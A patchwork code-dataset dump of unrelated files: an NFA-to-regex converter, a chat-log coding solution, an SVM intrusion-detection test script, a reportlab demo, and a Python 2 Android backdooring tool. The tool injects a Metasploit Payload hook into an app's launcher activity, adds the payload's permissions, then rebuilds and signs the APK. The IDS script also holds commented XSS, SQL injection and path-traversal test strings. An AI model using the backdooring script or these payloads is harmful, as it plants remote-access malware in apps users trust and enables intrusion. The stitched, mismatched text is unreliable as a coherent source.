dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
network.remNode(node)
delta = copy(network.getDelta(node))
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1
] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
try:
del network._deltas[node]
except KeyError:
continue
if DEBUG:
print('Working on connections: ', node, delta)
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and input + loopRegex +
input2 == ''):
network.addDelta(src, input + loopRegex +
input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(
prefix):]) for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]
) + ')' + suffix
else:
regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI
return regex
<|reserved_special_token_1|>
from util import AutomataError
from automata import NFA
from base import Node
from copy import copy
from functools import reduce  # reduce() is not a builtin in Python 3
from os.path import commonprefix

DEBUG = False

LAMBDA = u'\u03bb'  # λ: label used for the empty string
PHI = u'\u00d8'     # Ø: the empty language
def copyDeltas(src):
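    # Shallow two-level copy of a delta table {node: {input: set(dests)}}:
    # the destination sets are copied so later edits don't alias each other,
    # while the Node objects themselves remain shared.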
out = dict()
for k in src:
out[k] = dict()
for k2 in src[k]:
out[k][k2] = copy(src[k][k2])
return out
def replaceNode(nfa, old, new):
if DEBUG:
print('R_Start(%s, %s) ---' % (old, new), nfa)
if old in nfa._deltas:
for input in nfa._deltas[old]:
nfa.addDelta(new, input, nfa._deltas[old][input])
del nfa._deltas[old]
if DEBUG:
print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)
deltas_temp = copyDeltas(nfa._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
if old in deltas_temp[src][input]:
nfa._deltas[src][input].remove(old)
nfa._deltas[src][input].add(new)
if DEBUG:
print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)
def commonsuffix(seq):
def reverse(s):
out = ''
for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
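
# e.g. commonsuffix(['foo.php', 'admin.php']) == '.php'; this mirrors
# os.path.commonprefix applied to the reversed strings.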
class NetworkNFA(NFA):
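    # An NFA variant whose transition labels may be whole regular expressions
    # over the charset plus the metacharacters ( ) + *, rather than single
    # symbols. nfa2regex below performs state elimination on this structure.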
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([len(i) == 1 for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set(['{%s}' % i for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([type(i) is Node for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][input].union(
dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)
else:
raise AutomataError(
'Delta source must be Node, not %s.' % type(node).__name__)
def remDelta(self, node, input):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError(
'Delta source must be a Node, not %s' % type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - (self._charset.union(set('()+*'))):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join(
[i.label for i in self._terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label, input or 'lambda', ','.join(
[i.label for i in self._deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
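

# nfa2regex implements the standard state-elimination construction: wrap the
# automaton in fresh dummy start/end states, collapse parallel edges into a
# single '+'-joined label, then remove interior states one at a time, folding
# each state's self-loops in as a Kleene-starred infix, until the surviving
# start->end labels spell out the regex.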
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
    # Take care of multi-terminals (superseded by the dummy start/end below):
    # if len(network.terminals) > 1:
    #     end = Node('qf')
    #     network.addNode(end)
    #     for i in copy(network.terminals):
    #         network.addDelta(i, '', end)
    #         network.remTerminal(i)
    #     network.addTerminal(end)
# Add a dummy start and end nodes
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
# Collapse connections
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
# Collect pliable nodes
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
# Build a distance-from-terminal table
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes) # Lazy
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
    # Nodes are removed from toProcess while it is being iterated; entries
    # skipped within one pass are picked up again because the outer while
    # keeps re-running until the list drains.
    while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
# Sort pliable nodes by distance from terminal
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
# Remove Node
network.remNode(node)
# Save delta
delta = copy(network.getDelta(node))
# Convert loops to regex
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
# Remove loops
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
# Search lambda-closure equivalence
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
# Remove delta
try:
del network._deltas[node]
except KeyError: # No deltas remaining, had only loops
continue
if DEBUG:
print('Working on connections: ', node, delta)
# Check all possible connections through this node
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and (input + loopRegex + input2) == ''):
network.addDelta(
src, input + loopRegex + input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
# Extract common prefix/suffix
    branches = list(network.getDelta(network.start).keys())  # materialize: indexed and sorted below
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]
for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + \
'(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix
else:
regex = '+'.join([i or LAMBDA for i in branches]) or PHI
return regex
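

# --- Usage sketch (hedged) ---
# The NFA and Node classes come from the external `automata` and `base`
# modules, which are not part of this file. The sketch below assumes a
# zero-argument NFA() constructor alongside the addNode/addDelta/addTerminal
# API and settable `start` that nfa2regex itself relies on; treat it as an
# illustrative sketch, not a verified test.
#
# if __name__ == '__main__':
#     q0, q1 = Node('q0'), Node('q1')
#     nfa = NFA()                      # assumed constructor
#     nfa.addNode(q0)
#     nfa.addNode(q1)
#     nfa.start = q0
#     nfa.addTerminal(q1)
#     nfa.addDelta(q0, 'a', q1)        # q0 --a--> q1
#     nfa.addDelta(q1, 'b', q1)        # self-loop on b
#     print(nfa2regex(nfa))            # expected shape: ab*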
def solution(record):
    # Chat-room log replay: nicknames are keyed by user id, so a later
    # Enter/Change rewrites the name shown for every earlier event of that
    # id. The Korean literals are the required output strings of the original
    # problem: '님이 들어왔습니다.' = 'has entered.', '님이 나갔습니다.' = 'has left.'
    answer = []
    arr = dict()      # uid -> current nickname
    history = []      # (uid, event suffix) in arrival order
    for i in record:
        tmp = i.split()
        if tmp[0] == 'Enter':
            arr[tmp[1]] = tmp[2]
            history.append([tmp[1], '님이 들어왔습니다.'])
        elif tmp[0] == 'Leave':
            history.append([tmp[1], '님이 나갔습니다.'])
        elif tmp[0] == 'Change':
            arr[tmp[1]] = tmp[2]
    for i in history:
        answer.append(arr[i[0]] + i[1])
    return answer
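

# Worked example (input format "Enter/Leave/Change <uid> [nickname]"):
if __name__ == '__main__':
    record = ['Enter uid1234 Muzi', 'Enter uid4567 Prodo', 'Leave uid1234',
              'Enter uid1234 Prodo', 'Change uid4567 Ryan']
    print(solution(record))
    # ['Prodo님이 들어왔습니다.', 'Ryan님이 들어왔습니다.',
    #  'Prodo님이 나갔습니다.', 'Prodo님이 들어왔습니다.']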
import IDS

# Alternative benign test set: 'data/goodqueries.txt'
good_testfile = 'data/good_fromE2.txt'
bad_testfile = 'data/badqueries.txt'

# a = IDS.LG()  # logistic-regression model; the SVM is used below
a = IDS.SVM()

# Quick smoke test with hand-written payloads:
# preicdtlist = ['www.foo.com/id=1<script>alert(1)</script>',
#                "www.foo.com/name=admin' or 1=1", 'abc.com/admin.php',
#                '"><svg onload=confirm(1)>',
#                'test/q=<a href="javascript:confirm(1)>', 'q=../etc/passwd']
# result = a.predict(preicdtlist)
# print('Normal results, first 10: ' + str(result[0][:10]))

with open(good_testfile, 'r') as f:
    print('Predicting on dataset: ' + good_testfile)
    preicdtlist = [i.strip('\n') for i in f.readlines()]
    result = a.predict(preicdtlist)
    print('Malicious results, first 10: ' + str(result[1][:10]))
    print('Normal results, first 10: ' + str(result[0][:10]))

with open(bad_testfile, 'r') as f:
    print('Predicting on dataset: ' + bad_testfile)
    preicdtlist = [i.strip('\n') for i in f.readlines()]
    result = a.predict(preicdtlist)
    print('Malicious results, first 10: ' + str(result[1][:10]))
    print('Normal results, first 10: ' + str(result[0][:10]))
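
# Note: the IDS module is external to this dump. From the usage above, its
# SVM class is assumed to expose predict(list_of_query_strings) returning a
# pair where result[0] holds the queries judged normal and result[1] those
# judged malicious. A minimal stand-in with that shape, useful only for
# dry-running the script without the real model:
#
# class SVM:
#     def predict(self, queries):
#         bad = [q for q in queries if '<script>' in q or "' or 1=1" in q]
#         good = [q for q in queries if q not in bad]
#         return good, bad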
|
flexible
|
{
"blob_id": "e627bcc6c9a49d46190cc793a77103aa0a760989",
"index": 1709,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(good_testfile, 'r') as f:\n print('预测数据集: ' + good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: ' + bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n",
"step-3": "<mask token>\ngood_testfile = 'data/good_fromE2.txt'\nbad_testfile = 'data/badqueries.txt'\na = IDS.SVM()\nwith open(good_testfile, 'r') as f:\n print('预测数据集: ' + good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: ' + bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n",
"step-4": "import IDS\ngood_testfile = 'data/good_fromE2.txt'\nbad_testfile = 'data/badqueries.txt'\na = IDS.SVM()\nwith open(good_testfile, 'r') as f:\n print('预测数据集: ' + good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: ' + bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n",
"step-5": "\nimport IDS\n# In[7]:\n# testfile = 'data/good_fromE2.txt'\n# testfile = 'data/goodqueries.txt'\ngood_testfile = \"data/good_fromE2.txt\"\nbad_testfile = \"data/badqueries.txt\"\n# a = IDS.LG()\n\na = IDS.SVM()\n\n# preicdtlist = ['www.foo.com/id=1<script>alert(1)</script>','www.foo.com/name=admin\\' or 1=1','abc.com/admin.php','\"><svg onload=confirm(1)>','test/q=<a href=\"javascript:confirm(1)>','q=../etc/passwd']\n# result =a.predict(preicdtlist)\n# print('正常结果 前10条 ' + str(result[0][:10]))\n\n\n\nwith open(good_testfile, 'r') as f:\n print('预测数据集: '+good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条'+str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n\n\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: '+bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条'+str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
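The record above repeats one read-and-predict block per query file; the Chinese labels read roughly "prediction dataset", "malicious results, first 10", and "normal results, first 10". A minimal refactoring sketch of the same flow (the `IDS` module and its `SVM.predict()` interface are assumed from the record, not shown here):

def predict_file(model, path):
    # One query per line; strip the trailing newline before predicting.
    with open(path, 'r') as f:
        queries = [line.strip('\n') for line in f]
    result = model.predict(queries)
    print('dataset: ' + path)
    print('malicious, first 10: ' + str(result[1][:10]))
    print('normal, first 10: ' + str(result[0][:10]))
    return result

# import IDS                                   # assumed module from the record
# model = IDS.SVM()
# for path in ('data/good_fromE2.txt', 'data/badqueries.txt'):
#     predict_file(model, path)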
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def paragraph_spacing():
doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)
styles = getSampleStyleSheet()
styles['Normal'].spaceBefore = 10
styles['Normal'].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
doc.build(flowables)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def paragraph_spacing():
doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)
styles = getSampleStyleSheet()
styles['Normal'].spaceBefore = 10
styles['Normal'].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
doc.build(flowables)
if __name__ == '__main__':
paragraph_spacing()
<|reserved_special_token_1|>
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Paragraph
from reportlab.lib.styles import getSampleStyleSheet
def paragraph_spacing():
doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)
styles = getSampleStyleSheet()
styles['Normal'].spaceBefore = 10
styles['Normal'].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
doc.build(flowables)
if __name__ == '__main__':
paragraph_spacing()
<|reserved_special_token_1|>
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Paragraph
from reportlab.lib.styles import getSampleStyleSheet
def paragraph_spacing():
doc = SimpleDocTemplate("paragraph_spacing.pdf", pagesize=letter)
styles = getSampleStyleSheet()
    # Produces spacing between paragraphs so that <br/> is not needed
styles["Normal"].spaceBefore = 10
styles["Normal"].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles["Normal"])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles["Normal"])
flowables.append(para)
doc.build(flowables)
if __name__ == "__main__":
paragraph_spacing()
|
flexible
|
{
"blob_id": "d79e65b7aa09066230dec1a472f4535dff4123b5",
"index": 4217,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)\n styles = getSampleStyleSheet()\n styles['Normal'].spaceBefore = 10\n styles['Normal'].spaceAfter = 10\n flowables = []\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n doc.build(flowables)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)\n styles = getSampleStyleSheet()\n styles['Normal'].spaceBefore = 10\n styles['Normal'].spaceAfter = 10\n flowables = []\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n doc.build(flowables)\n\n\nif __name__ == '__main__':\n paragraph_spacing()\n",
"step-4": "from reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)\n styles = getSampleStyleSheet()\n styles['Normal'].spaceBefore = 10\n styles['Normal'].spaceAfter = 10\n flowables = []\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n doc.build(flowables)\n\n\nif __name__ == '__main__':\n paragraph_spacing()\n",
"step-5": "from reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate(\"paragraph_spacing.pdf\", pagesize=letter)\n\n styles = getSampleStyleSheet()\n #Mengahasilkan spasi antar paragraf sehinga tidak diperlukan <br/>\n styles[\"Normal\"].spaceBefore = 10\n styles[\"Normal\"].spaceAfter = 10\n\n flowables = []\n\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles[\"Normal\"])\n flowables.append(para)\n\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles[\"Normal\"])\n flowables.append(para)\n\n doc.build(flowables)\n\n\nif __name__ == \"__main__\":\n paragraph_spacing()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
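The record above adds the spacing by mutating the shared `Normal` style from `getSampleStyleSheet()`. An equivalent sketch that derives a child style instead (`ParagraphStyle` is standard ReportLab API), leaving the sample stylesheet untouched:

from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import ParagraphStyle, getSampleStyleSheet
from reportlab.platypus import Paragraph, SimpleDocTemplate

def paragraph_spacing_derived():
    doc = SimpleDocTemplate("paragraph_spacing_derived.pdf", pagesize=letter)
    styles = getSampleStyleSheet()
    # The child style carries the spacing; styles["Normal"] stays as-is.
    spaced = ParagraphStyle("Spaced", parent=styles["Normal"],
                            spaceBefore=10, spaceAfter=10)
    text = "This <b>text</b> is important, not <strong>strong</strong>."
    doc.build([Paragraph(text, style=spaced), Paragraph(text, style=spaced)])

if __name__ == "__main__":
    paragraph_spacing_derived()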
#!/usr/bin/env python
import os
import re
import pycolor
import sys
pyc = pycolor.pyColor()
def decompile(mainapk):
print pyc.Info("Decompiling apks...")
os.system("bash apktool.sh d -f %s"%mainapk)
os.system("bash apktool.sh d -f temp.apk")
def inject(mainapk):
print pyc.Info("Injecting payload...")
mk = "mkdir %s/smali/com/metasploit"%mainapk.split('.')[0]
os.system(mk)
mk = "mkdir %s/smali/com/metasploit/stage"%mainapk.split('.')[0]
os.system(mk)
cp = "cp temp/smali/com/metasploit/stage/Payload* %s/smali/com/metasploit/stage/"%mainapk.split('.')[0]
os.system(cp)
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.read()
fhandle.close()
fread = fread.split('<action android:name="android.intent.action.MAIN"/>')[0].split('<activity android:')[1]
acn = re.search('android:name=\"[\w.]+',fread)
activityname = acn.group(0).split('"')[1]
acpath = activityname.replace('.','/') + ".smali"
smalipath = "%s/smali/%s"%(mainapk.split('.')[0], acpath)
fhandle = open(smalipath,'r')
fread = fhandle.read()
fhandle.close()
print pyc.Info("Injecting hooks in %s..."%activityname)
fhalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[0]
shalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[1]
injection = ";->onCreate(Landroid/os/Bundle;)V\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
total = fhalf + injection + shalf
fhandle = open(smalipath,'w')
fhandle.write(total)
fhandle.close()
print pyc.Succ("Hook injected -> metasploit/stage/Payload")
def permissions(mainapk):
print pyc.Info("Adding permissions...")
filemanifest = "temp/AndroidManifest.xml"
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
prmns = []
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
fhandle.close()
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
half=[]
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
else:
half.append(line)
prmns = set(prmns)
fhandle.close()
fhandle = open(filemanifest,'w')
for i in half:
if half.index(i)==2:
for j in prmns:
fhandle.write(j+"\n")
else:
fhandle.write(i)
for i in prmns:
print '\t',i.split('android:name="')[1].split('"')[0]
print pyc.Succ("%d Permissions added."%(len(prmns)))
def rebuild(mainapk):
print pyc.Info("Recompiling...")
rebuild = "bash apktool.sh b -f %s"%mainapk.split('.')[0]
os.system(rebuild)
print pyc.Info("Signing apk...")
path = "%s/dist/%s"%(mainapk.split('.')[0],mainapk)
signapk = "java -jar signapk.jar cert.x509.pem privatekey.pk8 %s %s-final.apk"%(path,mainapk[:-4])
os.system(signapk)
print pyc.Succ("Successfully backdoored and saved as %s-final.apk"%mainapk[:-4])
|
normal
|
{
"blob_id": "fcc73647a5e841bcb5ea4fcd06579cc6912cfe1e",
"index": 435,
"step-1": "#!/usr/bin/env python\n\nimport os\nimport re\nimport pycolor\nimport sys\n\npyc = pycolor.pyColor()\n\ndef decompile(mainapk):\n\tprint pyc.Info(\"Decompiling apks...\")\n\tos.system(\"bash apktool.sh d -f %s\"%mainapk)\n\tos.system(\"bash apktool.sh d -f temp.apk\")\n\ndef inject(mainapk):\n\tprint pyc.Info(\"Injecting payload...\")\n\tmk = \"mkdir %s/smali/com/metasploit\"%mainapk.split('.')[0]\n\tos.system(mk)\n\tmk = \"mkdir %s/smali/com/metasploit/stage\"%mainapk.split('.')[0]\n\tos.system(mk)\n\tcp = \"cp temp/smali/com/metasploit/stage/Payload* %s/smali/com/metasploit/stage/\"%mainapk.split('.')[0]\n\tos.system(cp)\n\tfilemanifest = \"%s/AndroidManifest.xml\"%mainapk.split('.')[0]\n\tfhandle = open(filemanifest,'r')\n\tfread = fhandle.read()\n\tfhandle.close()\n\tfread = fread.split('<action android:name=\"android.intent.action.MAIN\"/>')[0].split('<activity android:')[1]\n\tacn = re.search('android:name=\\\"[\\w.]+',fread)\n\tactivityname = acn.group(0).split('\"')[1]\n\tacpath = activityname.replace('.','/') + \".smali\"\n\tsmalipath = \"%s/smali/%s\"%(mainapk.split('.')[0], acpath)\n\tfhandle = open(smalipath,'r')\n\tfread = fhandle.read()\n\tfhandle.close()\n\tprint pyc.Info(\"Injecting hooks in %s...\"%activityname)\n\tfhalf = fread.split(\";->onCreate(Landroid/os/Bundle;)V\")[0]\n\tshalf = fread.split(\";->onCreate(Landroid/os/Bundle;)V\")[1]\n\tinjection = \";->onCreate(Landroid/os/Bundle;)V\\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V\"\n\ttotal = fhalf + injection + shalf\n\tfhandle = open(smalipath,'w')\n\tfhandle.write(total)\n\tfhandle.close()\n\tprint pyc.Succ(\"Hook injected -> metasploit/stage/Payload\")\n\ndef permissions(mainapk):\n\tprint pyc.Info(\"Adding permissions...\")\n\tfilemanifest = \"temp/AndroidManifest.xml\"\n\tfhandle = open(filemanifest,'r')\n\tfread = fhandle.readlines()\n\tprmns = []\n\tfor line in fread:\n\t\tif('<uses-permission' in line):\n\t\t\tprmns.append(line.replace('\\n',''))\t\n\tfhandle.close()\n\tfilemanifest = \"%s/AndroidManifest.xml\"%mainapk.split('.')[0]\n\tfhandle = open(filemanifest,'r')\n\tfread = fhandle.readlines()\n\thalf=[]\n\tfor line in fread:\n\t\tif('<uses-permission' 